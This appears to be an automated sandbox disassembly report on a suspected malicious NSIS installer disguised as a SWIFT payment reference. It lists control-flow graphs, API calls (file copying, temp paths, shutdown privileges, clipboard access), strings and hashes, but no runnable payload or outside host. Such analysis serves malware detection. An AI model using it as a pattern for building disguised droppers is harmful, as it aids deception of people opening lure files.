lstrcatW 89->107 104 403ab2-403abd ExitWindowsEx 91->104 105 403aa6-403ab0 91->105 92->91 97 4038b0-4038b5 93->97 98 4038b7-4038bf 93->98 97->98 102 4038c1 97->102 98->93 98->102 102->84 103->70 104->83 111 403abf-403ac1 call 40140b 104->111 105->104 105->111 108 403a21 106->108 109 403954-403957 106->109 107->106 108->65 112 403960 call 405ab5 109->112 113 403959-40395e call 405a38 109->113 111->83 121 403965-403975 SetCurrentDirectoryW 112->121 113->121 123 403982-4039ae call 406507 121->123 124 403977-40397d call 406507 121->124 128 4039b3-4039ce call 406544 DeleteFileW 123->128 124->123 131 4039d0-4039e0 CopyFileW 128->131 132 403a0e-403a18 128->132 131->132 133 4039e2-403a02 call 4062c7 call 406544 call 405aea 131->133 132->128 134 403a1a-403a1c call 4062c7 132->134 133->132 142 403a04-403a0b CloseHandle 133->142 134->108 142->132
                            APIs
                            • SetErrorMode.KERNELBASE(00008001), ref: 0040351A
                            • GetVersionExW.KERNEL32(?), ref: 00403543
                            • GetVersionExW.KERNEL32(0000011C), ref: 0040355A
                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004035F1
                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040362D
                            • OleInitialize.OLE32(00000000), ref: 00403634
                            • SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 00403652
                            • GetCommandLineW.KERNEL32(00429220,NSIS Error), ref: 00403667
                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe",00000020,"C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe",00000000), ref: 004036A0
                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037D3
                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
                            • DeleteFileW.KERNELBASE(1033), ref: 00403839
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403920
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040392F
                              • Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040393A
                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe",00000000,?), ref: 00403946
                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
                            • DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,00420EC8,00000001), ref: 004039D8
                            • CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
                            • OleUninitialize.OLE32(?), ref: 00403A28
                            • ExitProcess.KERNEL32 ref: 00403A42
                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AB5
                            • ExitProcess.KERNEL32 ref: 00403AD6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                            • String ID: "C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne$C:\Users\user\Desktop$C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                            • API String ID: 3859024572-1758701899
                            • Opcode ID: d026ce5e89d3d63a3cb2047e2171d7ed2e8d5a22846132119ce05c7a2189c2c0
                            • Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
                            • Opcode Fuzzy Hash: d026ce5e89d3d63a3cb2047e2171d7ed2e8d5a22846132119ce05c7a2189c2c0
                            • Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 143 4056a8-4056c3 144 405852-405859 143->144 145 4056c9-405790 GetDlgItem * 3 call 404498 call 404df1 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405883-405890 144->147 148 40585b-40587d GetDlgItem CreateThread FindCloseChangeNotification 144->148 167 405792-4057ac SendMessageW * 2 145->167 168 4057ae-4057b1 145->168 150 405892-405898 147->150 151 4058ae-4058b8 147->151 148->147 155 4058d3-4058dc call 4044ca 150->155 156 40589a-4058a9 ShowWindow * 2 call 404498 150->156 152 4058ba-4058c0 151->152 153 40590e-405912 151->153 157 4058c2-4058ce call 40443c 152->157 158 4058e8-4058f8 ShowWindow 152->158 153->155 161 405914-40591a 153->161 164 4058e1-4058e5 155->164 156->151 157->155 165 405908-405909 call 40443c 158->165 166 4058fa-405903 call 405569 158->166 161->155 169 40591c-40592f SendMessageW 161->169 165->153 166->165 167->168 172 4057c1-4057d8 call 404463 168->172 173 4057b3-4057bf SendMessageW 168->173 174 405a31-405a33 169->174 175 405935-405960 CreatePopupMenu call 406544 AppendMenuW 169->175 182 4057da-4057ee ShowWindow 172->182 183 40580e-40582f GetDlgItem SendMessageW 172->183 173->172 174->164 180 405962-405972 GetWindowRect 175->180 181 405975-40598a TrackPopupMenu 175->181 180->181 181->174 184 405990-4059a7 181->184 185 4057f0-4057fb ShowWindow 182->185 186 4057fd 182->186 183->174 187 405835-40584d SendMessageW * 2 183->187 188 4059ac-4059c7 SendMessageW 184->188 189 405803-405809 call 404498 185->189 186->189 187->174 188->188 190 4059c9-4059ec OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 4059ee-405a15 SendMessageW 190->192 192->192 193 405a17-405a2b GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                            APIs
                            • GetDlgItem.USER32(?,00000403), ref: 00405706
                            • GetDlgItem.USER32(?,000003EE), ref: 00405715
                            • GetClientRect.USER32(?,?), ref: 00405752
                            • GetSystemMetrics.USER32(00000002), ref: 00405759
                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
                            • ShowWindow.USER32(?,00000008), ref: 004057F5
                            • GetDlgItem.USER32(?,000003EC), ref: 00405816
                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
                            • GetDlgItem.USER32(?,000003F8), ref: 00405724
                              • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                            • GetDlgItem.USER32(?,000003EC), ref: 00405868
                            • CreateThread.KERNELBASE(00000000,00000000,Function_0000563C,00000000), ref: 00405876
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040587D
                            • ShowWindow.USER32(00000000), ref: 004058A1
                            • ShowWindow.USER32(?,00000008), ref: 004058A6
                            • ShowWindow.USER32(00000008), ref: 004058F0
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
                            • CreatePopupMenu.USER32 ref: 00405935
                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405949
                            • GetWindowRect.USER32(?,?), ref: 00405969
                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
                            • OpenClipboard.USER32(00000000), ref: 004059CA
                            • EmptyClipboard.USER32 ref: 004059D0
                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
                            • GlobalLock.KERNEL32(00000000), ref: 004059E6
                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405A25
                            • CloseClipboard.USER32 ref: 00405A2B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                            • String ID: {
                            • API String ID: 4154960007-366298937
                            • Opcode ID: 69f2edf26230f29e268ef45ac4ed4cb659919fb54a3fa664988597a572f6dd3e
                            • Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
                            • Opcode Fuzzy Hash: 69f2edf26230f29e268ef45ac4ed4cb659919fb54a3fa664988597a572f6dd3e
                            • Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 442 405c13-405c39 call 405ede 445 405c52-405c59 442->445 446 405c3b-405c4d DeleteFileW 442->446 448 405c5b-405c5d 445->448 449 405c6c-405c7c call 406507 445->449 447 405dcf-405dd3 446->447 450 405c63-405c66 448->450 451 405d7d-405d82 448->451 455 405c8b-405c8c call 405e22 449->455 456 405c7e-405c89 lstrcatW 449->456 450->449 450->451 451->447 454 405d84-405d87 451->454 457 405d91-405d99 call 40683d 454->457 458 405d89-405d8f 454->458 459 405c91-405c95 455->459 456->459 457->447 466 405d9b-405daf call 405dd6 call 405bcb 457->466 458->447 462 405ca1-405ca7 lstrcatW 459->462 463 405c97-405c9f 459->463 465 405cac-405cc8 lstrlenW FindFirstFileW 462->465 463->462 463->465 467 405d72-405d76 465->467 468 405cce-405cd6 465->468 482 405db1-405db4 466->482 483 405dc7-405dca call 405569 466->483 467->451 470 405d78 467->470 471 405cf6-405d0a call 406507 468->471 472 405cd8-405ce0 468->472 470->451 484 405d21-405d2c call 405bcb 471->484 485 405d0c-405d14 471->485 475 405ce2-405cea 472->475 476 405d55-405d65 FindNextFileW 472->476 475->471 481 405cec-405cf4 475->481 476->468 480 405d6b-405d6c FindClose 476->480 480->467 481->471 481->476 482->458 486 405db6-405dc5 call 405569 call 4062c7 482->486 483->447 495 405d4d-405d50 call 405569 484->495 496 405d2e-405d31 484->496 485->476 487 405d16-405d1f call 405c13 485->487 486->447 487->476 495->476 499 405d33-405d43 call 405569 call 4062c7 496->499 500 405d45-405d4b 496->500 499->476 500->476
                            APIs
                            • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
                            • lstrcatW.KERNEL32(Nightingalize.flo,\*.*), ref: 00405C84
                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405CA7
                            • lstrlenW.KERNEL32(?,?,0040A014,?,Nightingalize.flo,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
                            • FindFirstFileW.KERNELBASE(Nightingalize.flo,?,?,?,0040A014,?,Nightingalize.flo,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
                            • FindClose.KERNEL32(00000000), ref: 00405D6C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                            • String ID: .$.$C:\Users\user\AppData\Local\Temp\$Nightingalize.flo$\*.*
                            • API String ID: 2035342205-2367672989
                            • Opcode ID: 22b78437034c19dc3c69d1be1f85d3962df73c454374f768f30d5383a4f62e3f
                            • Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
                            • Opcode Fuzzy Hash: 22b78437034c19dc3c69d1be1f85d3962df73c454374f768f30d5383a4f62e3f
                            • Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                            • Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
                            • Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                            • Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • FindFirstFileW.KERNELBASE(74DF3420,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406848
                            • FindClose.KERNELBASE(00000000), ref: 00406854
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: Find$CloseFileFirst
                            • String ID: XgB
                            • API String ID: 2295610775-796949446
                            • Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                            • Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
                            • Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                            • Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: CreateInstance
                            • String ID:
                            • API String ID: 542301482-0
                            • Opcode ID: 6811baaf47db24cfac7ebdc10481c5fcd69a9e6f97522136bc8b2f89416beb60
                            • Instruction ID: 543bd56792285dd9977ebe6a5c934514532920c251de70bc34d4fa366edb348e
                            • Opcode Fuzzy Hash: 6811baaf47db24cfac7ebdc10481c5fcd69a9e6f97522136bc8b2f89416beb60
                            • Instruction Fuzzy Hash: 80411771A00209EFCF40DFE4C989E9D7BB5BF49308B20456AF505EB2D1DB799941CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: FileFindFirst
                            • String ID:
                            • API String ID: 1974802433-0
                            • Opcode ID: 554cdb13688f7b56c37498335d5809ca92329a56170aef0c3fc70529fa211c7f
                            • Instruction ID: 26775ad4c1080374fb75430f90045566014d5e2c4dab898babe53efe7e17598a
                            • Opcode Fuzzy Hash: 554cdb13688f7b56c37498335d5809ca92329a56170aef0c3fc70529fa211c7f
                            • Instruction Fuzzy Hash: F3F08271A04104EFD701DBA4DD49AAEB378FF14314F60417BE101F21D0E7B88E129B2A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 194 403f64-403f76 195 403f7c-403f82 194->195 196 4040dd-4040ec 194->196 195->196 197 403f88-403f91 195->197 198 40413b-404150 196->198 199 4040ee-404136 GetDlgItem * 2 call 404463 SetClassLongW call 40140b 196->199 200 403f93-403fa0 SetWindowPos 197->200 201 403fa6-403fad 197->201 203 404190-404195 call 4044af 198->203 204 404152-404155 198->204 199->198 200->201 206 403ff1-403ff7 201->206 207 403faf-403fc9 ShowWindow 201->207 212 40419a-4041b5 203->212 209 404157-404162 call 401389 204->209 210 404188-40418a 204->210 215 404010-404013 206->215 216 403ff9-40400b DestroyWindow 206->216 213 4040ca-4040d8 call 4044ca 207->213 214 403fcf-403fe2 GetWindowLongW 207->214 209->210 229 404164-404183 SendMessageW 209->229 210->203 211 404430 210->211 224 404432-404439 211->224 221 4041b7-4041b9 call 40140b 212->221 222 4041be-4041c4 212->222 213->224 214->213 223 403fe8-403feb ShowWindow 214->223 227 404015-404021 SetWindowLongW 215->227 228 404026-40402c 215->228 225 40440d-404413 216->225 221->222 233 4041ca-4041d5 222->233 234 4043ee-404407 DestroyWindow EndDialog 222->234 223->206 225->211 232 404415-40441b 225->232 227->224 228->213 235 404032-404041 GetDlgItem 228->235 229->224 232->211 236 40441d-404426 ShowWindow 232->236 233->234 237 4041db-404228 call 406544 call 404463 * 3 GetDlgItem 233->237 234->225 238 404060-404063 235->238 239 404043-40405a SendMessageW IsWindowEnabled 235->239 236->211 266 404232-40426e ShowWindow KiUserCallbackDispatcher call 404485 EnableWindow 237->266 267 40422a-40422f 237->267 240 404065-404066 238->240 241 404068-40406b 238->241 239->211 239->238 243 404096-40409b call 40443c 240->243 244 404079-40407e 241->244 245 40406d-404073 241->245 243->213 247 4040b4-4040c4 SendMessageW 244->247 249 404080-404086 244->249 245->247 248 404075-404077 245->248 247->213 248->243 252 404088-40408e call 40140b 249->252 253 40409d-4040a6 call 40140b 249->253 264 404094 252->264 253->213 262 4040a8-4040b2 253->262 262->264 264->243 270 404270-404271 266->270 271 404273 266->271 267->266 272 404275-4042a3 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042a5-4042b6 SendMessageW 272->273 274 4042b8 272->274 275 4042be-4042fd call 404498 call 403f45 call 406507 lstrlenW call 406544 SetWindowTextW call 401389 273->275 274->275 275->212 286 404303-404305 275->286 286->212 287 40430b-40430f 286->287 288 404311-404317 287->288 289 40432e-404342 DestroyWindow 287->289 288->211 290 40431d-404323 288->290 289->225 291 404348-404375 CreateDialogParamW 289->291 290->212 292 404329 290->292 291->225 293 40437b-4043d2 call 404463 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->211 293->211 298 4043d4-4043e7 ShowWindow call 4044af 293->298 300 4043ec 298->300 300->225
                            APIs
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FA0
                            • ShowWindow.USER32(?), ref: 00403FC0
                            • GetWindowLongW.USER32(?,000000F0), ref: 00403FD2
